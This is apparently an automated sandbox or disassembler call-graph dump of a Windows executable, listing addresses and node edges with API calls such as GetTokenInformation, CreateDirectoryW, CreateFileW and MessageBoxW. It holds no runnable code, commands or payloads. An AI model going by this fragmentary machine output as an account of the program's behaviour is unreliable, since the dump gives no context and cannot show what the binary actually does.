7ff67aee04d4 17079->17106 17081 7ff67aee078d 17081->16393 17118 7ff67aee042c 17082->17118 17086 7ff67aedc8c0 17085->17086 17087 7ff67aed2930 GetCurrentProcessId 17086->17087 17088 7ff67aed1c80 49 API calls 17087->17088 17089 7ff67aed2979 17088->17089 17132 7ff67aee49f4 17089->17132 17094 7ff67aed1c80 49 API calls 17095 7ff67aed29ff 17094->17095 17162 7ff67aed2620 17095->17162 17098 7ff67aedc5c0 _log10_special 8 API calls 17099 7ff67aed2a31 17098->17099 17099->16432 17101 7ff67aed1b89 17100->17101 17102 7ff67aee0189 17100->17102 17101->16431 17101->16432 17103 7ff67aee4f78 memcpy_s 11 API calls 17102->17103 17104 7ff67aee018e 17103->17104 17105 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17104->17105 17105->17101 17107 7ff67aee053e 17106->17107 17108 7ff67aee04fe 17106->17108 17107->17108 17110 7ff67aee054a 17107->17110 17109 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17108->17109 17111 7ff67aee0525 17109->17111 17117 7ff67aee54dc EnterCriticalSection 17110->17117 17111->17081 17119 7ff67aed1a20 17118->17119 17120 7ff67aee0456 17118->17120 17119->16400 17119->16401 17120->17119 17121 7ff67aee04a2 17120->17121 17122 7ff67aee0465 memcpy_s 17120->17122 17131 7ff67aee54dc EnterCriticalSection 17121->17131 17125 7ff67aee4f78 memcpy_s 11 API calls 17122->17125 17127 7ff67aee047a 17125->17127 17129 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17127->17129 17129->17119 17135 7ff67aee4a4e 17132->17135 17133 7ff67aee4a73 17136 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17133->17136 17134 7ff67aee4aaf 17171 7ff67aee2c80 17134->17171 17135->17133 17135->17134 17149 7ff67aee4a9d 17136->17149 17138 7ff67aee4b8c 17140 7ff67aeea9b8 __free_lconv_mon 11 API calls 17138->17140 17139 7ff67aedc5c0 _log10_special 8 API calls 17142 7ff67aed29c3 17139->17142 17140->17149 17150 7ff67aee51d0 17142->17150 17143 7ff67aee4b61 17146 7ff67aeea9b8 __free_lconv_mon 11 API calls 17143->17146 17144 7ff67aee4bb0 17144->17138 17145 7ff67aee4bba 17144->17145 17148 
7ff67aeea9b8 __free_lconv_mon 11 API calls 17145->17148 17146->17149 17147 7ff67aee4b58 17147->17138 17147->17143 17148->17149 17149->17139 17151 7ff67aeeb338 memcpy_s 11 API calls 17150->17151 17152 7ff67aee51e7 17151->17152 17153 7ff67aeeec08 memcpy_s 11 API calls 17152->17153 17156 7ff67aee5227 17152->17156 17159 7ff67aed29e5 17152->17159 17154 7ff67aee521c 17153->17154 17155 7ff67aeea9b8 __free_lconv_mon 11 API calls 17154->17155 17155->17156 17156->17159 17309 7ff67aeeec90 17156->17309 17159->17094 17160 7ff67aeea970 _isindst 17 API calls 17161 7ff67aee526c 17160->17161 17163 7ff67aed262f 17162->17163 17164 7ff67aed9400 2 API calls 17163->17164 17165 7ff67aed2660 17164->17165 17166 7ff67aed2683 MessageBoxA 17165->17166 17167 7ff67aed266f MessageBoxW 17165->17167 17168 7ff67aed2690 17166->17168 17167->17168 17169 7ff67aedc5c0 _log10_special 8 API calls 17168->17169 17170 7ff67aed26a0 17169->17170 17170->17098 17172 7ff67aee2cbe 17171->17172 17173 7ff67aee2cae 17171->17173 17174 7ff67aee2cc7 17172->17174 17179 7ff67aee2cf5 17172->17179 17175 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17173->17175 17176 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17174->17176 17177 7ff67aee2ced 17175->17177 17176->17177 17177->17138 17177->17143 17177->17144 17177->17147 17178 7ff67aee4830 45 API calls 17178->17179 17179->17173 17179->17177 17179->17178 17181 7ff67aee2fa4 17179->17181 17185 7ff67aee3610 17179->17185 17211 7ff67aee32d8 17179->17211 17241 7ff67aee2b60 17179->17241 17183 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17181->17183 17183->17173 17186 7ff67aee3652 17185->17186 17187 7ff67aee36c5 17185->17187 17188 7ff67aee36ef 17186->17188 17189 7ff67aee3658 17186->17189 17190 7ff67aee371f 17187->17190 17191 7ff67aee36ca 17187->17191 17258 7ff67aee1bc0 17188->17258 17196 7ff67aee365d 17189->17196 17199 7ff67aee372e 17189->17199 17190->17188 17190->17199 17209 7ff67aee3688 17190->17209 17192 7ff67aee36ff 17191->17192 17193 7ff67aee36cc 17191->17193 
17265 7ff67aee17b0 17192->17265 17195 7ff67aee366d 17193->17195 17202 7ff67aee36db 17193->17202 17210 7ff67aee375d 17195->17210 17244 7ff67aee3f74 17195->17244 17196->17195 17200 7ff67aee36a0 17196->17200 17196->17209 17199->17210 17272 7ff67aee1fd0 17199->17272 17200->17210 17254 7ff67aee4430 17200->17254 17202->17188 17203 7ff67aee36e0 17202->17203 17206 7ff67aee45c8 37 API calls 17203->17206 17203->17210 17205 7ff67aedc5c0 _log10_special 8 API calls 17207 7ff67aee39f3 17205->17207 17206->17209 17207->17179 17209->17210 17279 7ff67aeee8c8 17209->17279 17210->17205 17212 7ff67aee32e3 17211->17212 17213 7ff67aee32f9 17211->17213 17214 7ff67aee3337 17212->17214 17215 7ff67aee3652 17212->17215 17216 7ff67aee36c5 17212->17216 17213->17214 17217 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17213->17217 17214->17179 17218 7ff67aee36ef 17215->17218 17219 7ff67aee3658 17215->17219 17220 7ff67aee371f 17216->17220 17221 7ff67aee36ca 17216->17221 17217->17214 17223 7ff67aee1bc0 38 API calls 17218->17223 17226 7ff67aee365d 17219->17226 17227 7ff67aee372e 17219->17227 17220->17218 17220->17227 17239 7ff67aee3688 17220->17239 17222 7ff67aee36ff 17221->17222 17228 7ff67aee36cc 17221->17228 17224 7ff67aee17b0 38 API calls 17222->17224 17223->17239 17224->17239 17225 7ff67aee3f74 47 API calls 17225->17239 17229 7ff67aee366d 17226->17229 17230 7ff67aee36a0 17226->17230 17226->17239 17231 7ff67aee1fd0 38 API calls 17227->17231 17240 7ff67aee375d 17227->17240 17228->17229 17232 7ff67aee36db 17228->17232 17229->17225 17229->17240 17234 7ff67aee4430 47 API calls 17230->17234 17230->17240 17231->17239 17232->17218 17233 7ff67aee36e0 17232->17233 17236 7ff67aee45c8 37 API calls 17233->17236 17233->17240 17234->17239 17235 7ff67aedc5c0 _log10_special 8 API calls 17237 7ff67aee39f3 17235->17237 17236->17239 17237->17179 17238 7ff67aeee8c8 47 API calls 17238->17239 17239->17238 17239->17240 17240->17235 17292 7ff67aee0d84 17241->17292 17245 7ff67aee3f96 17244->17245 17246 
7ff67aee0bf0 12 API calls 17245->17246 17247 7ff67aee3fde 17246->17247 17248 7ff67aeee5e0 46 API calls 17247->17248 17250 7ff67aee40b1 17248->17250 17249 7ff67aee40d3 17252 7ff67aee4830 45 API calls 17249->17252 17253 7ff67aee415c 17249->17253 17250->17249 17251 7ff67aee4830 45 API calls 17250->17251 17251->17249 17252->17253 17253->17209 17255 7ff67aee4448 17254->17255 17257 7ff67aee44b0 17254->17257 17256 7ff67aeee8c8 47 API calls 17255->17256 17255->17257 17256->17257 17257->17209 17259 7ff67aee1bf3 17258->17259 17260 7ff67aee1c22 17259->17260 17263 7ff67aee1cdf 17259->17263 17261 7ff67aee1c5f 17260->17261 17262 7ff67aee0bf0 12 API calls 17260->17262 17261->17209 17262->17261 17264 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17263->17264 17264->17261 17266 7ff67aee17e3 17265->17266 17267 7ff67aee1812 17266->17267 17269 7ff67aee18cf 17266->17269 17268 7ff67aee0bf0 12 API calls 17267->17268 17271 7ff67aee184f 17267->17271 17268->17271 17270 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17269->17270 17270->17271 17271->17209 17273 7ff67aee2003 17272->17273 17274 7ff67aee2032 17273->17274 17276 7ff67aee20ef 17273->17276 17275 7ff67aee0bf0 12 API calls 17274->17275 17278 7ff67aee206f 17274->17278 17275->17278 17277 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17276->17277 17277->17278 17278->17209 17280 7ff67aeee8f0 17279->17280 17281 7ff67aeee935 17280->17281 17282 7ff67aee4830 45 API calls 17280->17282 17285 7ff67aeee8f5 memcpy_s 17280->17285 17288 7ff67aeee91e memcpy_s 17280->17288 17281->17285 17281->17288 17289 7ff67aef0858 17281->17289 17282->17281 17283 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17283->17285 17285->17209 17288->17283 17288->17285 17290 7ff67aef087c WideCharToMultiByte 17289->17290 17293 7ff67aee0dc3 17292->17293 17294 7ff67aee0db1 17292->17294 17296 7ff67aee0e0d 17293->17296 17298 7ff67aee0dd0 17293->17298 17295 7ff67aee4f78 memcpy_s 11 API calls 17294->17295 17297 7ff67aee0db6 17295->17297 17301 7ff67aee0eb6 
17296->17301 17302 7ff67aee4f78 memcpy_s 11 API calls 17296->17302 17299 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17297->17299 17300 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17298->17300 17304 7ff67aee0dc1 17299->17304 17300->17304 17303 7ff67aee4f78 memcpy_s 11 API calls 17301->17303 17301->17304 17305 7ff67aee0eab 17302->17305 17306 7ff67aee0f60 17303->17306 17304->17179 17308 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17305->17308 17307 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17306->17307 17307->17304 17308->17301 17314 7ff67aeeecad 17309->17314 17310 7ff67aeeecb2 17311 7ff67aee524d 17310->17311 17312 7ff67aee4f78 memcpy_s 11 API calls 17310->17312 17311->17159 17311->17160 17313 7ff67aeeecbc 17312->17313 17315 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17313->17315 17314->17310 17314->17311 17316 7ff67aeeecfc 17314->17316 17315->17311 17316->17311 17317 7ff67aee4f78 memcpy_s 11 API calls 17316->17317 17317->17313 17319 7ff67aee82b5 17318->17319 17320 7ff67aee82c8 17318->17320 17321 7ff67aee4f78 memcpy_s 11 API calls 17319->17321 17328 7ff67aee7f2c 17320->17328 17324 7ff67aee82ba 17321->17324 17325 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17324->17325 17327 7ff67aee82c6 17325->17327 17327->16452 17335 7ff67aef0348 EnterCriticalSection 17328->17335 17337 7ff67aed8823 __vcrt_freefls 17336->17337 17338 7ff67aed87a1 GetTokenInformation 17336->17338 17341 7ff67aed883c 17337->17341 17342 7ff67aed8836 CloseHandle 17337->17342 17339 7ff67aed87c2 GetLastError 17338->17339 17340 7ff67aed87cd 17338->17340 17339->17337 17339->17340 17340->17337 17343 7ff67aed87e9 GetTokenInformation 17340->17343 17341->16457 17342->17341 17343->17337 17344 7ff67aed880c 17343->17344 17344->17337 17345 7ff67aed8816 ConvertSidToStringSidW 17344->17345 17345->17337 17347 7ff67aedc8c0 17346->17347 17348 7ff67aed2b74 GetCurrentProcessId 17347->17348 17349 7ff67aed26b0 48 API calls 17348->17349 17350 7ff67aed2bc7 17349->17350 17351 
7ff67aee4c48 48 API calls 17350->17351 17352 7ff67aed2c10 MessageBoxW 17351->17352 17353 7ff67aedc5c0 _log10_special 8 API calls 17352->17353 17354 7ff67aed2c40 17353->17354 17354->16467 17356 7ff67aed25e5 17355->17356 17357 7ff67aee4c48 48 API calls 17356->17357 17358 7ff67aed2604 17357->17358 17358->16483 17394 7ff67aee8804 17359->17394 17363 7ff67aed81cc 17362->17363 17364 7ff67aed9400 2 API calls 17363->17364 17365 7ff67aed81eb 17364->17365 17366 7ff67aed81f3 17365->17366 17367 7ff67aed8206 ExpandEnvironmentStringsW 17365->17367 17368 7ff67aed2810 49 API calls 17366->17368 17369 7ff67aed822c __vcrt_freefls 17367->17369 17370 7ff67aed81ff __vcrt_freefls 17368->17370 17371 7ff67aed8243 17369->17371 17372 7ff67aed8230 17369->17372 17373 7ff67aedc5c0 _log10_special 8 API calls 17370->17373 17376 7ff67aed82af 17371->17376 17377 7ff67aed8251 GetDriveTypeW 17371->17377 17374 7ff67aed2810 49 API calls 17372->17374 17375 7ff67aed839f 17373->17375 17374->17370 17532 7ff67aee7e78 17376->17532 17380 7ff67aed8285 17377->17380 17381 7ff67aed82a0 17377->17381 17435 7ff67aef15c8 17394->17435 17494 7ff67aef1340 17435->17494 17515 7ff67aef0348 EnterCriticalSection 17494->17515 17634 7ff67aed455a 17633->17634 17635 7ff67aed9400 2 API calls 17634->17635 17636 7ff67aed457f 17635->17636 17637 7ff67aedc5c0 _log10_special 8 API calls 17636->17637 17638 7ff67aed45a7 17637->17638 17638->16509 17640 7ff67aed7e1e 17639->17640 17641 7ff67aed7f42 17640->17641 17642 7ff67aed1c80 49 API calls 17640->17642 17643 7ff67aedc5c0 _log10_special 8 API calls 17641->17643 17646 7ff67aed7ea5 17642->17646 17644 7ff67aed7f73 17643->17644 17644->16509 17645 7ff67aed1c80 49 API calls 17645->17646 17646->17641 17646->17645 17647 7ff67aed4550 10 API calls 17646->17647 17648 7ff67aed7efb 17646->17648 17647->17646 17649 7ff67aed9400 2 API calls 17648->17649 17650 7ff67aed7f13 CreateDirectoryW 17649->17650 17650->17641 17650->17646 17652 7ff67aed1613 17651->17652 17653 7ff67aed1637 17651->17653 17772 
7ff67aed1050 17652->17772 17655 7ff67aed45b0 108 API calls 17653->17655 17657 7ff67aed164b 17655->17657 17656 7ff67aed1618 17660 7ff67aed162e 17656->17660 17663 7ff67aed2710 54 API calls 17656->17663 17658 7ff67aed1682 17657->17658 17659 7ff67aed1653 17657->17659 17662 7ff67aed45b0 108 API calls 17658->17662 17661 7ff67aee4f78 memcpy_s 11 API calls 17659->17661 17660->16509 17664 7ff67aed1658 17661->17664 17665 7ff67aed1696 17662->17665 17663->17660 17666 7ff67aed2910 54 API calls 17664->17666 17667 7ff67aed169e 17665->17667 17668 7ff67aed16b8 17665->17668 17669 7ff67aed1671 17666->17669 17670 7ff67aed2710 54 API calls 17667->17670 17671 7ff67aee0744 73 API calls 17668->17671 17669->16509 17672 7ff67aed16ae 17670->17672 17673 7ff67aed16cd 17671->17673 17678 7ff67aee00bc 74 API calls 17672->17678 17674 7ff67aed16d1 17673->17674 17675 7ff67aed16f9 17673->17675 17679 7ff67aee4f78 memcpy_s 11 API calls 17674->17679 17676 7ff67aed16ff 17675->17676 17677 7ff67aed1717 17675->17677 17750 7ff67aed1210 17676->17750 17684 7ff67aed1739 17677->17684 17694 7ff67aed1761 17677->17694 17682 7ff67aed1829 17678->17682 17680 7ff67aed16d6 17679->17680 17682->16509 17700 7ff67aed717b 17699->17700 17702 7ff67aed7134 17699->17702 17700->16509 17702->17700 17836 7ff67aee5094 17702->17836 17704 7ff67aed4191 17703->17704 17705 7ff67aed44d0 49 API calls 17704->17705 17706 7ff67aed41cb 17705->17706 17707 7ff67aed44d0 49 API calls 17706->17707 17708 7ff67aed41db 17707->17708 17709 7ff67aed422c 17708->17709 17710 7ff67aed41fd 17708->17710 17711 7ff67aed4100 51 API calls 17709->17711 17867 7ff67aed4100 17710->17867 17713 7ff67aed422a 17711->17713 17714 7ff67aed428c 17713->17714 17715 7ff67aed4257 17713->17715 17717 7ff67aed4100 51 API calls 17714->17717 17874 7ff67aed7ce0 17715->17874 17719 7ff67aed42b0 17717->17719 17748 7ff67aed1c80 49 API calls 17747->17748 17749 7ff67aed4464 17748->17749 17749->16509 17773 7ff67aed45b0 108 API calls 17772->17773 17774 7ff67aed108c 17773->17774 17775 
7ff67aed1094 17774->17775 17776 7ff67aed10a9 17774->17776 17778 7ff67aed2710 54 API calls 17775->17778 17777 7ff67aee0744 73 API calls 17776->17777 17779 7ff67aed10bf 17777->17779 17784 7ff67aed10a4 __vcrt_freefls 17778->17784 17780 7ff67aed10c3 17779->17780 17781 7ff67aed10e6 17779->17781 17782 7ff67aee4f78 memcpy_s 11 API calls 17780->17782 17786 7ff67aed1122 17781->17786 17787 7ff67aed10f7 17781->17787 17783 7ff67aed10c8 17782->17783 17785 7ff67aed2910 54 API calls 17783->17785 17784->17656 17802 7ff67aed10e1 __vcrt_freefls 17785->17802 17788 7ff67aed1129 17786->17788 17796 7ff67aed113c 17786->17796 17789 7ff67aee4f78 memcpy_s 11 API calls 17787->17789 17790 7ff67aed1210 92 API calls 17788->17790 17791 7ff67aed1100 17789->17791 17790->17802 17792 7ff67aee00bc 74 API calls 17795 7ff67aee040c _fread_nolock 53 API calls 17795->17796 17796->17795 17798 7ff67aed11ed 17796->17798 17796->17802 17799 7ff67aee4f78 memcpy_s 11 API calls 17798->17799 17802->17792 17837 7ff67aee50a1 17836->17837 17839 7ff67aee50ce 17836->17839 17840 7ff67aee4f78 memcpy_s 11 API calls 17837->17840 17841 7ff67aee5058 17837->17841 17838 7ff67aee50f1 17842 7ff67aee4f78 memcpy_s 11 API calls 17838->17842 17839->17838 17843 7ff67aee510d 17839->17843 17844 7ff67aee50ab 17840->17844 17841->17702 17845 7ff67aee50f6 17842->17845 17851 7ff67aee4fbc 17843->17851 17847 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17844->17847 17848 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17845->17848 17849 7ff67aee50b6 17847->17849 17850 7ff67aee5101 17848->17850 17849->17702 17850->17702 17852 7ff67aee4fe0 17851->17852 17853 7ff67aee4fdb 17851->17853 17852->17853 17854 7ff67aeeb1c0 __GetCurrentState 45 API calls 17852->17854 17853->17850 17855 7ff67aee4ffb 17854->17855 17859 7ff67aeed9f4 17855->17859 17860 7ff67aeeda09 17859->17860 17862 7ff67aee501e 17859->17862 17861 7ff67aef3374 45 API calls 17860->17861 17860->17862 17861->17862 17863 7ff67aeeda60 17862->17863 17864 7ff67aeeda75 17863->17864 
17866 7ff67aeeda88 17863->17866 17864->17866 17866->17853 17868 7ff67aed4126 17867->17868 17869 7ff67aee49f4 49 API calls 17868->17869 17870 7ff67aed414c 17869->17870 17871 7ff67aed415d 17870->17871 17872 7ff67aed4550 10 API calls 17870->17872 17871->17713 17875 7ff67aed7cf5 17874->17875 17931 7ff67aee5f38 17930->17931 17932 7ff67aee5f5e 17931->17932 17934 7ff67aee5f91 17931->17934 17933 7ff67aee4f78 memcpy_s 11 API calls 17932->17933 17935 7ff67aee5f63 17933->17935 17936 7ff67aee5fa4 17934->17936 17937 7ff67aee5f97 17934->17937 17938 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17935->17938 17949 7ff67aeeac98 17936->17949 17939 7ff67aee4f78 memcpy_s 11 API calls 17937->17939 17941 7ff67aed4606 17938->17941 17939->17941 17941->16545 17962 7ff67aef0348 EnterCriticalSection 17949->17962 18322 7ff67aee7968 18321->18322 18325 7ff67aee7444 18322->18325 18324 7ff67aee7981 18324->16555 18326 7ff67aee745f 18325->18326 18327 7ff67aee748e 18325->18327 18329 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 18326->18329 18335 7ff67aee54dc EnterCriticalSection 18327->18335 18331 7ff67aee747f 18329->18331 18331->18324 18337 7ff67aedfeb3 18336->18337 18338 7ff67aedfee1 18336->18338 18339 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 18337->18339 18345 7ff67aedfed3 18338->18345 18346 7ff67aee54dc EnterCriticalSection 18338->18346 18339->18345 18345->16559 18348 7ff67aed45b0 108 API calls 18347->18348 18349 7ff67aed1493 18348->18349 18350 7ff67aed149b 18349->18350 18351 7ff67aed14bc 18349->18351 18352 7ff67aed2710 54 API calls 18350->18352 18353 7ff67aee0744 73 API calls 18351->18353 18354 7ff67aed14ab 18352->18354 18355 7ff67aed14d1 18353->18355 18354->16585 18356 7ff67aed14d5 18355->18356 18357 7ff67aed14f8 18355->18357 18358 7ff67aee4f78 memcpy_s 11 API calls 18356->18358 18360 7ff67aed1532 18357->18360 18361 7ff67aed1508 18357->18361 18454 7ff67aed6365 18453->18454 18455 7ff67aed1c80 49 API calls 18454->18455 18456 7ff67aed63a1 18455->18456 18457 7ff67aed63aa 
18456->18457 18458 7ff67aed63cd 18456->18458 18460 7ff67aed2710 54 API calls 18457->18460 18459 7ff67aed4620 49 API calls 18458->18459 18463 7ff67aed63e5 18459->18463 18461 7ff67aed63c3 18460->18461 18466 7ff67aedc5c0 _log10_special 8 API calls 18461->18466 18462 7ff67aed6403 18465 7ff67aed4550 10 API calls 18462->18465 18463->18462 18464 7ff67aed2710 54 API calls 18463->18464 18464->18462 18467 7ff67aed640d 18465->18467 18468 7ff67aed336e 18466->18468 18469 7ff67aed641b 18467->18469 18470 7ff67aed9070 3 API calls 18467->18470 18468->16654 18484 7ff67aed64f0 18468->18484 18471 7ff67aed4620 49 API calls 18469->18471 18470->18469 18633 7ff67aed53f0 18484->18633 18635 7ff67aed541c 18633->18635 18634 7ff67aed5424 18635->18634 18638 7ff67aed55c4 18635->18638 18664 7ff67aee6b14 18635->18664 19976 7ff67aef1720 19987 7ff67aef7454 19976->19987 19988 7ff67aef7461 19987->19988 19989 7ff67aeea9b8 __free_lconv_mon 11 API calls 19988->19989 19990 7ff67aef747d 19988->19990 19989->19988 19991 7ff67aeea9b8 __free_lconv_mon 11 API calls 19990->19991 19992 7ff67aef1729 19990->19992 19991->19990 19993 7ff67aef0348 EnterCriticalSection 19992->19993 19380 7ff67aee5698 19381 7ff67aee56b2 19380->19381 19382 7ff67aee56cf 19380->19382 19384 7ff67aee4f58 _fread_nolock 11 API calls 19381->19384 19382->19381 19383 7ff67aee56e2 CreateFileW 19382->19383 19385 7ff67aee574c 19383->19385 19386 7ff67aee5716 19383->19386 19387 7ff67aee56b7 19384->19387 19431 7ff67aee5c74 19385->19431 19405 7ff67aee57ec GetFileType 19386->19405 19390 7ff67aee4f78 memcpy_s 11 API calls 19387->19390 19391 7ff67aee56bf 19390->19391 19394 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19391->19394 19400 7ff67aee56ca 19394->19400 19395 7ff67aee5741 CloseHandle 19395->19400 19396 7ff67aee572b CloseHandle 19396->19400 19397 7ff67aee5755 19401 7ff67aee4eec _fread_nolock 11 API calls 19397->19401 19398 7ff67aee5780 19452 7ff67aee5a34 19398->19452 19404 7ff67aee575f 19401->19404 19404->19400 19406 7ff67aee583a 19405->19406 
19407 7ff67aee58f7 19405->19407 19408 7ff67aee5866 GetFileInformationByHandle 19406->19408 19412 7ff67aee5b70 21 API calls 19406->19412 19409 7ff67aee58ff 19407->19409 19410 7ff67aee5921 19407->19410 19413 7ff67aee5912 GetLastError 19408->19413 19414 7ff67aee588f 19408->19414 19409->19413 19415 7ff67aee5903 19409->19415 19411 7ff67aee5944 PeekNamedPipe 19410->19411 19429 7ff67aee58e2 19410->19429 19411->19429 19416 7ff67aee5854 19412->19416 19419 7ff67aee4eec _fread_nolock 11 API calls 19413->19419 19417 7ff67aee5a34 51 API calls 19414->19417 19418 7ff67aee4f78 memcpy_s 11 API calls 19415->19418 19416->19408 19416->19429 19421 7ff67aee589a 19417->19421 19418->19429 19419->19429 19420 7ff67aedc5c0 _log10_special 8 API calls 19422 7ff67aee5724 19420->19422 19469 7ff67aee5994 19421->19469 19422->19395 19422->19396 19425 7ff67aee5994 10 API calls 19426 7ff67aee58b9 19425->19426 19427 7ff67aee5994 10 API calls 19426->19427 19428 7ff67aee58ca 19427->19428 19428->19429 19430 7ff67aee4f78 memcpy_s 11 API calls 19428->19430 19429->19420 19430->19429 19432 7ff67aee5caa 19431->19432 19433 7ff67aee4f78 memcpy_s 11 API calls 19432->19433 19451 7ff67aee5d42 __vcrt_freefls 19432->19451 19435 7ff67aee5cbc 19433->19435 19434 7ff67aedc5c0 _log10_special 8 API calls 19436 7ff67aee5751 19434->19436 19437 7ff67aee4f78 memcpy_s 11 API calls 19435->19437 19436->19397 19436->19398 19438 7ff67aee5cc4 19437->19438 19439 7ff67aee7e78 45 API calls 19438->19439 19440 7ff67aee5cd9 19439->19440 19441 7ff67aee5ce1 19440->19441 19442 7ff67aee5ceb 19440->19442 19443 7ff67aee4f78 memcpy_s 11 API calls 19441->19443 19444 7ff67aee4f78 memcpy_s 11 API calls 19442->19444 19448 7ff67aee5ce6 19443->19448 19445 7ff67aee5cf0 19444->19445 19446 7ff67aee4f78 memcpy_s 11 API calls 19445->19446 19445->19451 19447 7ff67aee5cfa 19446->19447 19450 7ff67aee7e78 45 API calls 19447->19450 19449 7ff67aee5d34 GetDriveTypeW 19448->19449 19448->19451 19449->19451 19450->19448 19451->19434 19454 7ff67aee5a5c 19452->19454 
19453 7ff67aee578d 19462 7ff67aee5b70 19453->19462 19454->19453 19476 7ff67aeef794 19454->19476 19456 7ff67aee5af0 19456->19453 19457 7ff67aeef794 51 API calls 19456->19457 19458 7ff67aee5b03 19457->19458 19458->19453 19459 7ff67aeef794 51 API calls 19458->19459 19460 7ff67aee5b16 19459->19460 19460->19453 19461 7ff67aeef794 51 API calls 19460->19461 19461->19453 19463 7ff67aee5b8a 19462->19463 19464 7ff67aee5bc1 19463->19464 19465 7ff67aee5b9a 19463->19465 19466 7ff67aeef628 21 API calls 19464->19466 19467 7ff67aee4eec _fread_nolock 11 API calls 19465->19467 19468 7ff67aee5baa 19465->19468 19466->19468 19467->19468 19468->19404 19470 7ff67aee59b0 19469->19470 19471 7ff67aee59bd FileTimeToSystemTime 19469->19471 19470->19471 19473 7ff67aee59b8 19470->19473 19472 7ff67aee59d1 SystemTimeToTzSpecificLocalTime 19471->19472 19471->19473 19472->19473 19474 7ff67aedc5c0 _log10_special 8 API calls 19473->19474 19475 7ff67aee58a9 19474->19475 19475->19425 19477 7ff67aeef7a1 19476->19477 19478 7ff67aeef7c5 19476->19478 19477->19478 19479 7ff67aeef7a6 19477->19479 19481 7ff67aeef7ff 19478->19481 19482 7ff67aeef81e 19478->19482 19480 7ff67aee4f78 memcpy_s 11 API calls 19479->19480 19483 7ff67aeef7ab 19480->19483 19484 7ff67aee4f78 memcpy_s 11 API calls 19481->19484 19485 7ff67aee4fbc 45 API calls 19482->19485 19486 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19483->19486 19487 7ff67aeef804 19484->19487 19492 7ff67aeef82b 19485->19492 19488 7ff67aeef7b6 19486->19488 19489 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19487->19489 19488->19456 19490 7ff67aeef80f 19489->19490 19490->19456 19491 7ff67aef054c 51 API calls 19491->19492 19492->19490 19492->19491 19873 7ff67aeec590 19884 7ff67aef0348 EnterCriticalSection 19873->19884 20547 7ff67aee5480 20548 7ff67aee548b 20547->20548 20556 7ff67aeef314 20548->20556 20569 7ff67aef0348 EnterCriticalSection 20556->20569 19565 7ff67aeef9fc 19566 7ff67aeefbee 19565->19566 19569 7ff67aeefa3e _isindst 19565->19569 19567 
7ff67aee4f78 memcpy_s 11 API calls 19566->19567 19585 7ff67aeefbde 19567->19585 19568 7ff67aedc5c0 _log10_special 8 API calls 19570 7ff67aeefc09 19568->19570 19569->19566 19571 7ff67aeefabe _isindst 19569->19571 19586 7ff67aef6204 19571->19586 19576 7ff67aeefc1a 19578 7ff67aeea970 _isindst 17 API calls 19576->19578 19580 7ff67aeefc2e 19578->19580 19583 7ff67aeefb1b 19583->19585 19610 7ff67aef6248 19583->19610 19585->19568 19587 7ff67aef6213 19586->19587 19588 7ff67aeefadc 19586->19588 19617 7ff67aef0348 EnterCriticalSection 19587->19617 19592 7ff67aef5608 19588->19592 19593 7ff67aef5611 19592->19593 19594 7ff67aeefaf1 19592->19594 19595 7ff67aee4f78 memcpy_s 11 API calls 19593->19595 19594->19576 19598 7ff67aef5638 19594->19598 19596 7ff67aef5616 19595->19596 19597 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19596->19597 19597->19594 19599 7ff67aef5641 19598->19599 19600 7ff67aeefb02 19598->19600 19601 7ff67aee4f78 memcpy_s 11 API calls 19599->19601 19600->19576 19604 7ff67aef5668 19600->19604 19602 7ff67aef5646 19601->19602 19603 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19602->19603 19603->19600 19605 7ff67aef5671 19604->19605 19606 7ff67aeefb13 19604->19606 19607 7ff67aee4f78 memcpy_s 11 API calls 19605->19607 19606->19576 19606->19583 19608 7ff67aef5676 19607->19608 19609 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19608->19609 19609->19606 19618 7ff67aef0348 EnterCriticalSection 19610->19618 20583 7ff67aefae6e 20584 7ff67aefae7d 20583->20584 20585 7ff67aefae87 20583->20585 20587 7ff67aef03a8 LeaveCriticalSection 20584->20587 19706 7ff67aefadd9 19709 7ff67aee54e8 LeaveCriticalSection 19706->19709 20589 7ff67aefac53 20590 7ff67aefac63 20589->20590 20593 7ff67aee54e8 LeaveCriticalSection 20590->20593 15918 7ff67aee99d1 15930 7ff67aeea448 15918->15930 15935 7ff67aeeb1c0 GetLastError 15930->15935 15936 7ff67aeeb1e4 FlsGetValue 15935->15936 15937 7ff67aeeb201 FlsSetValue 15935->15937 15938 7ff67aeeb1fb 15936->15938 15954 7ff67aeeb1f1 
